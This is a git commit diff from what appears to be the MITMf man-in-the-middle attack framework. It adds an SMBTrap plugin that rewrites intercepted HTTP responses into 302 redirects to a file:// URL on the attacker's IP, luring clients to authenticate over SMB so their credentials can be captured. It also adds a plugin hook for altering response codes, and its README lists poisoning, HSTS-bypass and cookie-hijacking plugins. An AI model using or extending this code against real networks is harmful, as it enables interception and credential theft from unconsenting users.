Merged the SMBTrap plugin to master and relative code changes

2025-07-16 10:03:52 -07:00 · 2015-06-02 23:54:33 +02:00 · 2015-06-02 23:54:33 +02:00 · c2354b9b63
commit c2354b9b63
parent 87cb98b6ac
4 changed files with 47 additions and 1 deletions
--- a/README.md
+++ b/README.md
@ -16,6 +16,7 @@ Contact me at:

 Available plugins
 =================
+- ```SMBtrap``` - Exploits the 'SMB Trap' vulnerability on connected clients
 - ```Screenshotter``` -  Uses HTML5 Canvas to render an accurate screenshot of a clients browser
 - ```Responder``` - LLMNR, NBT-NS, WPAD and MDNS poisoner
 - ```SSLstrip+``` - Partially bypass HSTS
@ -36,6 +37,8 @@ Available plugins
 Changelog
 =========

+- Added the ```SMBTrap``` plugin
+
 - Config file now updates on the fly!

 - ```SessionHijacker``` is replaced with ```Ferret-NG```,  captures cookies and starts a proxy that will feed them to connected clients
--- a/core/sslstrip/ServerConnection.py
+++ b/core/sslstrip/ServerConnection.py
@ -72,7 +72,12 @@ class ServerConnection(HTTPClient):
    def sendRequest(self):
        if self.command == 'GET':
            try:
+                
+                if ('Unknown' in self.clientInfo[0]) or ('Unknown' in self.clientInfo[1]):
+                    mitmf_logger.info("{} Sending Request: {}".format(self.client.getClientIP(), self.headers['host']))
+                else:
                    mitmf_logger.info("{} [type:{} os:{}] Sending Request: {}".format(self.client.getClientIP(), self.clientInfo[1], self.clientInfo[0], self.headers['host']))
+            
            except Exception as e:
                mitmf_logger.debug("[ServerConnection] Unable to parse UA: {}".format(e))
                mitmf_logger.info("{} Sending Request: {}".format(self.client.getClientIP(), self.headers['host']))
@ -120,6 +125,13 @@ class ServerConnection(HTTPClient):
            self.sendPostData()

    def handleStatus(self, version, code, message):
+
+        values = self.plugins.hook()
+
+        version = values['version']
+        code    = values['code']
+        message = values['message']
+
        mitmf_logger.debug("[ServerConnection] Server response: {} {} {}".format(version, code, message))
        self.client.setResponseCode(int(code), message)

--- a/plugins/SMBTrap.py
+++ b/plugins/SMBTrap.py
@ -0,0 +1,24 @@
+import logging
+import random
+import string
+from plugins.plugin import Plugin
+from core.utils import SystemConfig
+
+mitmf_logger = logging.getLogger("mitmf")
+
+class SMBTrap(Plugin):
+	name = "SMBTrap"
+	optname = "smbtrap"
+	desc = "Exploits the SMBTrap vulnerability on connected clients"
+	version = "1.0"
+	has_opts = False
+
+	def initialize(self, options):
+		self.ourip = SystemConfig.getIP(options.interface)
+
+	def serverResponseStatus(self, request, version, code, message):
+		return {"request": request, "version": version, "code": 302, "message": "Found"}
+
+	def serverHeaders(self, response, request):
+		mitmf_logger.info("{} [SMBTrap] Trapping request to {}".format(request.client.getClientIP(), request.headers['host']))
+		response.headers["Location"] = "file://{}/{}".format(self.ourip, ''.join(random.sample(string.ascii_uppercase + string.digits, 8)))
--- a/plugins/plugin.py
+++ b/plugins/plugin.py
@ -12,6 +12,7 @@ class Plugin(ConfigWatcher, object):
    optname     = "generic"
    tree_info   = list()
    desc        = ""
+    version     = "0.0"
    has_opts    = False

    def initialize(self, options):
@ -41,6 +42,12 @@ class Plugin(ConfigWatcher, object):
        '''
        pass

+    def serverResponseStatus(self, request, version, code, message):
+        '''
+            Handles server response HTTP version, code and message
+        '''
+        return {"request": request, "version": version, "code": code, "message": message}
+
    def serverResponse(self, response, request, data):
        '''
            Handles all non-image responses by default, hooks handleResponse() (See Upsidedownternet for how to get images)